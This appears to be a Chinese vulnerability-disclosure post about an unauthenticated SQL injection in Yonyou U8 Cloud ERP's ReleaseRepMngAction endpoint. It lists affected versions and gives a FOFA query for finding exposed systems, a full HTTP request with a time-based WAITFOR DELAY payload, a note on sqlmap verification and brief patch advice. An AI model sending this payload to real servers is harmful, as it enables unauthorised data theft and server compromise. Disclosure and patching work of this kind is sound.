大家好，今天是Dest1ny漏洞庫的專題！！

會時不時發送新的漏洞資訊！！

大家多多關注，多多點贊！！！

---

0x01 產品簡介

用友U8?Cloud是用友推出的新一代云ERP，主要聚焦成長型、創新型企業，提供企業級云ERP整體解決方案。是基于全新的企業互聯網理念設計的云ERP系統，它旨在為企業提供集人財物客產供銷于一體的云ERP整體解決方案，推動企業敏經營、輕管理、簡IT，助力企業實現高速發展與云化創新。

0x02 漏洞概述

用友U8 Cloud ReleaseRepMngAction 接口處存在SQL注入漏洞，未經身份驗證的遠程攻擊者除了可以利用 SQL 注入漏洞獲取數據庫中的信息（例如，管理員后臺密碼、站點的用戶個人信息）之外，甚至在高權限的情況可向服務器中寫入木馬，進一步獲取服務器系統權限。

0x03 影響范圍

version = 1.0,2.0,2.1,2.3,2.5,2.6,2.65,2.7,3.0,3.1,3.2,3.5,3.6,3.6sp,5.0,5.0sp

0x04 復現環境

FOFA：title=="U8C"

0x05 漏洞復現

GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

延時5秒

Sqlmap驗證

0x06 修復建議

升級補丁<U8CLOUD系統ReleaseRepMngAction接口存在SQL注入漏洞的安全補丁>